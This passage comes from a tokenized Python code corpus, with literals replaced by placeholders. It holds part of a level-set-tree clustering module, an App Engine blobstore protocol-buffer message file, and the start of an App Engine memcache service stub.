iteritems ( ) if v == width ] ) <EOL> else : <EOL> ktemp = _np . min ( [ v for v in nclust . itervalues ( ) if v > k ] ) <EOL> cut = _np . min ( [ e for e , v in nclust . iteritems ( ) if v == ktemp ] ) <EOL> return cut <EOL> def _construct_branch_map ( self , ix , interval , form , horizontal_spacing , <EOL> sort ) : <EOL> """<STR_LIT>""" <EOL> children = _np . array ( self . nodes [ ix ] . children ) <EOL> n_child = len ( children ) <EOL> if n_child == <NUM_LIT:0> : <EOL> xpos = _np . mean ( interval ) <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> if form == '<STR_LIT>' : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_level ] , <EOL> [ xpos , self . nodes [ ix ] . end_level ] ) ) <EOL> else : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_mass ] , <EOL> [ xpos , self . nodes [ ix ] . end_mass ] ) ) <EOL> else : <EOL> parent_range = interval [ <NUM_LIT:1> ] - interval [ <NUM_LIT:0> ] <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> census = _np . array ( [ len ( self . nodes [ x ] . members ) for x in children ] , <EOL> dtype = _np . float ) <EOL> weights = census / sum ( census ) <EOL> if sort is True : <EOL> seniority = _np . argsort ( weights ) [ : : - <NUM_LIT:1> ] <EOL> children = children [ seniority ] <EOL> weights = weights [ seniority ] <EOL> if horizontal_spacing == '<STR_LIT>' : <EOL> child_intervals = _np . cumsum ( weights ) <EOL> child_intervals = _np . insert ( child_intervals , <NUM_LIT:0> , <NUM_LIT:0.0> ) <EOL> elif horizontal_spacing == '<STR_LIT>' : <EOL> child_intervals = _np . 
linspace ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , n_child + <NUM_LIT:1> ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> for j , child in enumerate ( children ) : <EOL> branch_interval = ( <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j ] * parent_range , <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j + <NUM_LIT:1> ] * parent_range ) <EOL> branch = self . _construct_branch_map ( child , branch_interval , <EOL> form , horizontal_spacing , <EOL> sort ) <EOL> branch_segs , branch_splits , branch_segmap , branch_splitmap = branch <EOL> segmap += branch_segmap <EOL> splitmap += branch_splitmap <EOL> splits = dict ( splits . items ( ) + branch_splits . items ( ) ) <EOL> segments = dict ( segments . items ( ) + branch_segs . items ( ) ) <EOL> children_xpos = _np . array ( [ segments [ k ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] for k in children ] ) <EOL> xpos = _np . mean ( children_xpos ) <EOL> for child in children : <EOL> splitmap . append ( child ) <EOL> child_xpos = segments [ child ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if form == '<STR_LIT>' : <EOL> splits [ child ] = ( <EOL> [ xpos , self . nodes [ ix ] . end_level ] , <EOL> [ child_xpos , self . nodes [ ix ] . end_level ] ) <EOL> else : <EOL> splits [ child ] = ( <EOL> [ xpos , self . nodes [ ix ] . end_mass ] , <EOL> [ child_xpos , self . nodes [ ix ] . end_mass ] ) <EOL> if form == '<STR_LIT>' : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_level ] , <EOL> [ xpos , self . nodes [ ix ] . end_level ] ) ) <EOL> else : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_mass ] , <EOL> [ xpos , self . nodes [ ix ] . end_mass ] ) ) <EOL> return segments , splits , segmap , splitmap <EOL> def _construct_mass_map ( self , ix , start_pile , interval , <EOL> horizontal_spacing ) : <EOL> """<STR_LIT>""" <EOL> size = float ( len ( self . nodes [ ix ] . members ) ) <EOL> children = _np . array ( self . nodes [ ix ] . 
children ) <EOL> n_child = len ( children ) <EOL> if n_child == <NUM_LIT:0> : <EOL> xpos = _np . mean ( interval ) <EOL> end_pile = start_pile + size / len ( self . density ) <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> segments [ ix ] = ( [ xpos , start_pile ] , [ xpos , end_pile ] ) <EOL> else : <EOL> parent_range = interval [ <NUM_LIT:1> ] - interval [ <NUM_LIT:0> ] <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> census = _np . array ( [ len ( self . nodes [ x ] . members ) for x in children ] , <EOL> dtype = _np . float ) <EOL> weights = census / sum ( census ) <EOL> seniority = _np . argsort ( weights ) [ : : - <NUM_LIT:1> ] <EOL> children = children [ seniority ] <EOL> weights = weights [ seniority ] <EOL> if horizontal_spacing == '<STR_LIT>' : <EOL> child_intervals = _np . cumsum ( weights ) <EOL> child_intervals = _np . insert ( child_intervals , <NUM_LIT:0> , <NUM_LIT:0.0> ) <EOL> else : <EOL> child_intervals = _np . linspace ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , n_child + <NUM_LIT:1> ) <EOL> end_pile = start_pile + ( size - sum ( census ) ) / len ( self . density ) <EOL> for j , child in enumerate ( children ) : <EOL> branch_interval = ( <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j ] * parent_range , <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j + <NUM_LIT:1> ] * parent_range ) <EOL> branch = self . _construct_mass_map ( child , end_pile , <EOL> branch_interval , <EOL> horizontal_spacing ) <EOL> branch_segs , branch_splits , branch_segmap , branch_splitmap = branch <EOL> segmap += branch_segmap <EOL> splitmap += branch_splitmap <EOL> splits = dict ( splits . items ( ) + branch_splits . items ( ) ) <EOL> segments = dict ( segments . items ( ) + branch_segs . items ( ) ) <EOL> children_xpos = _np . array ( [ segments [ k ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] for k in children ] ) <EOL> xpos = _np . mean ( children_xpos ) <EOL> for child in children : <EOL> splitmap . 
append ( child ) <EOL> child_xpos = segments [ child ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> splits [ child ] = ( [ xpos , end_pile ] , [ child_xpos , end_pile ] ) <EOL> segments [ ix ] = ( [ xpos , start_pile ] , [ xpos , end_pile ] ) <EOL> return segments , splits , segmap , splitmap <EOL> def _mass_to_density ( self , mass ) : <EOL> """<STR_LIT>""" <EOL> density_order = _np . argsort ( self . density ) <EOL> n = len ( self . density ) <EOL> mass_fraction = max ( <NUM_LIT:0> , int ( round ( mass * n ) ) - <NUM_LIT:1> ) <EOL> level_index = density_order [ mass_fraction ] <EOL> level = self . density [ level_index ] <EOL> return level <EOL> def construct_tree ( X , k , prune_threshold = None , num_levels = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> sim_graph , radii = _utl . knn_graph ( X , k , method = '<STR_LIT>' ) <EOL> n , p = X . shape <EOL> density = _utl . knn_density ( radii , n , p , k ) <EOL> tree = construct_tree_from_graph ( adjacency_list = sim_graph , density = density , <EOL> prune_threshold = prune_threshold , <EOL> num_levels = num_levels , verbose = verbose ) <EOL> return tree <EOL> def construct_tree_from_graph ( adjacency_list , density , prune_threshold = None , <EOL> num_levels = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> levels = _utl . define_density_mass_grid ( density , num_levels = num_levels ) <EOL> G = _nx . from_dict_of_lists ( <EOL> { i : neighbors for i , neighbors in enumerate ( adjacency_list ) } ) <EOL> T = LevelSetTree ( density , levels ) <EOL> cc0 = _nx . connected_components ( G ) <EOL> for i , c in enumerate ( cc0 ) : <EOL> T . _subgraphs [ i ] = G . subgraph ( c ) <EOL> T . 
nodes [ i ] = ConnectedComponent ( <EOL> i , parent = None , children = [ ] , start_level = <NUM_LIT:0.> , end_level = None , <EOL> start_mass = <NUM_LIT:0.> , end_mass = None , members = c ) <EOL> previous_level = <NUM_LIT:0.> <EOL> n = float ( len ( adjacency_list ) ) <EOL> for i , level in enumerate ( levels ) : <EOL> if verbose and i % <NUM_LIT:100> == <NUM_LIT:0> : <EOL> _logging . info ( "<STR_LIT>" . format ( i ) ) <EOL> bg = _np . where ( ( density > previous_level ) & ( density <= level ) ) [ <NUM_LIT:0> ] <EOL> previous_level = level <EOL> old_vcount = sum ( [ x . number_of_nodes ( ) <EOL> for x in T . _subgraphs . itervalues ( ) ] ) <EOL> current_mass = <NUM_LIT:1.> - ( ( old_vcount - len ( bg ) ) / n ) <EOL> deactivate_keys = [ ] <EOL> activate_subgraphs = { } <EOL> for ( k , H ) in T . _subgraphs . iteritems ( ) : <EOL> H . remove_nodes_from ( bg ) <EOL> if H . number_of_nodes ( ) == <NUM_LIT:0> : <EOL> T . nodes [ k ] . end_level = level <EOL> T . nodes [ k ] . end_mass = current_mass <EOL> deactivate_keys . append ( k ) <EOL> else : <EOL> if not _nx . is_connected ( H ) : <EOL> T . nodes [ k ] . end_level = level <EOL> T . nodes [ k ] . end_mass = current_mass <EOL> deactivate_keys . append ( k ) <EOL> cc = _nx . connected_components ( H ) <EOL> for c in cc : <EOL> new_key = max ( T . nodes . keys ( ) ) + <NUM_LIT:1> <EOL> T . nodes [ k ] . children . append ( new_key ) <EOL> activate_subgraphs [ new_key ] = H . subgraph ( c ) <EOL> T . nodes [ new_key ] = ConnectedComponent ( <EOL> new_key , parent = k , children = [ ] , start_level = level , <EOL> end_level = None , start_mass = current_mass , <EOL> end_mass = None , members = c ) <EOL> for k in deactivate_keys : <EOL> del T . _subgraphs [ k ] <EOL> T . _subgraphs . update ( activate_subgraphs ) <EOL> if prune_threshold is not None : <EOL> T = T . 
prune ( threshold = prune_threshold ) <EOL> return T <EOL> def load_tree ( filename ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename , '<STR_LIT:rb>' ) as f : <EOL> T = _pickle . load ( f ) <EOL> return T </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> from google . appengine . api . api_base_pb import VoidProto <EOL> class BlobstoreServiceError ( ProtocolBuffer . ProtocolMessage ) : <EOL> OK = <NUM_LIT:0> <EOL> INTERNAL_ERROR = <NUM_LIT:1> <EOL> URL_TOO_LONG = <NUM_LIT:2> <EOL> PERMISSION_DENIED = <NUM_LIT:3> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT:OK>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n + <NUM_LIT:0> <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> class CreateUploadURLRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_success_path_ = <NUM_LIT:0> <EOL> success_path_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def success_path ( self ) : return self . success_path_ <EOL> def set_success_path ( self , x ) : <EOL> self . has_success_path_ = <NUM_LIT:1> <EOL> self . success_path_ = x <EOL> def clear_success_path ( self ) : <EOL> if self . has_success_path_ : <EOL> self . has_success_path_ = <NUM_LIT:0> <EOL> self . success_path_ = "<STR_LIT>" <EOL> def has_success_path ( self ) : return self . has_success_path_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_success_path ( ) ) : self . set_success_path ( x . success_path ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_success_path_ != x . has_success_path_ : return <NUM_LIT:0> <EOL> if self . has_success_path_ and self . success_path_ != x . success_path_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_success_path_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . success_path_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def Clear ( self ) : <EOL> self . 
clear_success_path ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . success_path_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_success_path ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_success_path_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . success_path_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksuccess_path = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> class CreateUploadURLResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_url_ = <NUM_LIT:0> <EOL> url_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def url ( self ) : return self . url_ <EOL> def set_url ( self , x ) : <EOL> self . has_url_ = <NUM_LIT:1> <EOL> self . url_ = x <EOL> def clear_url ( self ) : <EOL> if self . has_url_ : <EOL> self . has_url_ = <NUM_LIT:0> <EOL> self . url_ = "<STR_LIT>" <EOL> def has_url ( self ) : return self . has_url_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . 
has_url ( ) ) : self . set_url ( x . url ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_url_ != x . has_url_ : return <NUM_LIT:0> <EOL> if self . has_url_ and self . url_ != x . url_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_url_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . url_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def Clear ( self ) : <EOL> self . clear_url ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . url_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_url ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_url_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . url_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kurl = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:url>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . 
MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> class DeleteBlobRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . blob_key_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def blob_key_size ( self ) : return len ( self . blob_key_ ) <EOL> def blob_key_list ( self ) : return self . blob_key_ <EOL> def blob_key ( self , i ) : <EOL> return self . blob_key_ [ i ] <EOL> def set_blob_key ( self , i , x ) : <EOL> self . blob_key_ [ i ] = x <EOL> def add_blob_key ( self , x ) : <EOL> self . blob_key_ . append ( x ) <EOL> def clear_blob_key ( self ) : <EOL> self . blob_key_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . blob_key_size ( ) ) : self . add_blob_key ( x . blob_key ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . blob_key_ ) != len ( x . blob_key_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . blob_key_ , x . blob_key_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . blob_key_ ) <EOL> for i in xrange ( len ( self . blob_key_ ) ) : n += self . lengthString ( len ( self . blob_key_ [ i ] ) ) <EOL> return n + <NUM_LIT:0> <EOL> def Clear ( self ) : <EOL> self . clear_blob_key ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . blob_key_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . blob_key_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . add_blob_key ( d . 
getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . blob_key_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kblob_key = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import time <EOL> from google . appengine . api import apiproxy_stub <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api . memcache import memcache_service_pb <EOL> MemcacheSetResponse = memcache_service_pb . MemcacheSetResponse <EOL> MemcacheSetRequest = memcache_service_pb . MemcacheSetRequest <EOL> MemcacheIncrementRequest = memcache_service_pb . MemcacheIncrementRequest <EOL> MemcacheIncrementResponse = memcache_service_pb . MemcacheIncrementResponse <EOL> MemcacheDeleteResponse = memcache_service_pb . MemcacheDeleteResponse <EOL> class CacheEntry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , expiration , flags , gettime ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( value , basestring ) <EOL> assert len ( value ) <= memcache . MAX_VALUE_SIZE <EOL> assert isinstance ( expiration , ( int , long ) ) <EOL> self . _gettime = gettime <EOL> self . value = value <EOL> self . flags = flags <EOL> self . created_time = self . _gettime ( ) <EOL> self . will_expire = expiration != <NUM_LIT:0> <EOL> self . locked = False <EOL> self . _SetExpiration ( expiration ) <EOL> def _SetExpiration ( self , expiration ) : <EOL> """<STR_LIT>""" <EOL> if expiration > ( <NUM_LIT> * <NUM_LIT:30> ) : <EOL> self . expiration_time = expiration <EOL> else : <EOL> self . expiration_time = self . _gettime ( ) + expiration <EOL> def CheckExpired ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . will_expire and self . _gettime ( ) >= self . expiration_time <EOL> def ExpireAndLock ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . will_expire = True <EOL> self . locked = True <EOL> self . _SetExpiration ( timeout ) <EOL> def CheckLocked ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . locked and not self . CheckExpired ( ) <EOL> class MemcacheServiceStub ( apiproxy_stub . APIProxyStub ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , gettime = time . 
time , service_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( MemcacheServiceStub , self ) . __init__ ( service_name ) <EOL> self . _gettime = gettime <EOL> self . _ResetStats ( ) <EOL> self . _the_cache = { } <EOL> def _ResetStats ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _hits = <NUM_LIT:0> <EOL> self . _misses = <NUM_LIT:0> <EOL> self . _byte_hits = <NUM_LIT:0> <EOL> self . _cache_creation_time = self . _gettime ( ) <EOL> def _GetKey ( self , namespace , key ) : <EOL> """<STR_LIT>""" <EOL> namespace_dict = self . _the_cache . get ( namespace , None ) <EOL> if namespace_dict is None : <EOL> return None <EOL> entry = namespace_dict . get ( key , None ) <EOL> if entry is None : <EOL> return None <EOL> elif entry . CheckExpired ( ) : <EOL> del namespace_dict [ key ] <EOL> return None <EOL> else : <EOL> return entry <EOL> def _Dynamic_Get ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> keys = set ( request . key_list ( ) ) <EOL> for key in keys : <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None or entry . CheckLocked ( ) : <EOL> self . _misses += <NUM_LIT:1> <EOL> continue <EOL> self . _hits += <NUM_LIT:1> <EOL> self . _byte_hits += len ( entry . value ) <EOL> item = response . add_item ( ) <EOL> item . set_key ( key ) <EOL> item . set_value ( entry . value ) <EOL> item . set_flags ( entry . flags ) <EOL> def _Dynamic_Set ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> set_policy = item . set_policy ( ) <EOL> old_entry = self . _GetKey ( namespace , key ) <EOL> set_status = MemcacheSetResponse . NOT_STORED <EOL> if ( ( set_policy == MemcacheSetRequest . SET ) or <EOL> ( set_policy == MemcacheSetRequest . ADD and old_entry is None ) or <EOL> ( set_policy == MemcacheSetRequest . 
REPLACE and old_entry is not None ) ) : <EOL> if ( old_entry is None or <EOL> set_policy == MemcacheSetRequest . SET <EOL> or not old_entry . CheckLocked ( ) ) : <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( item . value ( ) , <EOL> item . expiration_time ( ) , <EOL> item . flags ( ) , <EOL> gettime = self . _gettime ) <EOL> set_status = MemcacheSetResponse . STORED <EOL> response . add_set_status ( set_status ) <EOL> def _Dynamic_Delete ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> delete_status = MemcacheDeleteResponse . DELETED <EOL> if entry is None : <EOL> delete_status = MemcacheDeleteResponse . NOT_FOUND <EOL> elif item . delete_time ( ) == <NUM_LIT:0> : <EOL> del self . _the_cache [ namespace ] [ key ] <EOL> else : <EOL> entry . ExpireAndLock ( item . delete_time ( ) ) <EOL> response . add_delete_status ( delete_status ) <EOL> def _internal_increment ( self , namespace , request ) : <EOL> """<STR_LIT>""" <EOL> key = request . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None : <EOL> if not request . has_initial_value ( ) : <EOL> return None <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( str ( request . initial_value ( ) ) , <EOL> expiration = <NUM_LIT:0> , <EOL> flags = <NUM_LIT:0> , <EOL> gettime = self . _gettime ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> assert entry is not None <EOL> try : <EOL> old_value = long ( entry . value ) <EOL> if old_value < <NUM_LIT:0> : <EOL> raise ValueError <EOL> except ValueError : <EOL> logging . error ( '<STR_LIT>' <EOL> '<STR_LIT>' , key ) <EOL> return None <EOL> delta = request . 
delta ( ) <EOL> if request . direction ( ) == MemcacheIncrementRequest . DECREMENT : <EOL> delta = - delta <EOL> new_value = old_value + delta <EOL> if not ( <NUM_LIT:0> <= new_value < <NUM_LIT:2> ** <NUM_LIT:64> ) : <EOL> new_value = <NUM_LIT:0> <EOL> entry . value = str ( new_value ) <EOL> return new_value <EOL> def _Dynamic_Increment ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> response . set_new_value ( self . _internal_increment ( namespace , request ) ) <EOL> def _Dynamic_BatchIncrement ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for request_item in request . item_list ( ) : <EOL> new_value = self . _internal_increment ( namespace , request_item ) <EOL> item = response . add_item ( ) <EOL> if new_value is None : <EOL> item . set_increment_status ( MemcacheIncrementResponse . NOT_CHANGED ) <EOL> else : <EOL> item . set_increment_status ( MemcacheIncrementResponse . OK ) <EOL> item . set_new_value ( new_value ) <EOL> def _Dynamic_FlushAll ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> self . _the_cache . clear ( ) <EOL> self . _ResetStats ( ) <EOL> def _Dynamic_Stats ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> stats = response . mutable_stats ( ) <EOL> stats . set_hits ( self . _hits ) <EOL> stats . set_misses ( self . _misses ) <EOL> stats . set_byte_hits ( self . _byte_hits ) <EOL> items = <NUM_LIT:0> <EOL> total_bytes = <NUM_LIT:0> <EOL> for namespace in self . _the_cache . itervalues ( ) : <EOL> items += len ( namespace ) <EOL> for entry in namespace . itervalues ( ) : <EOL> 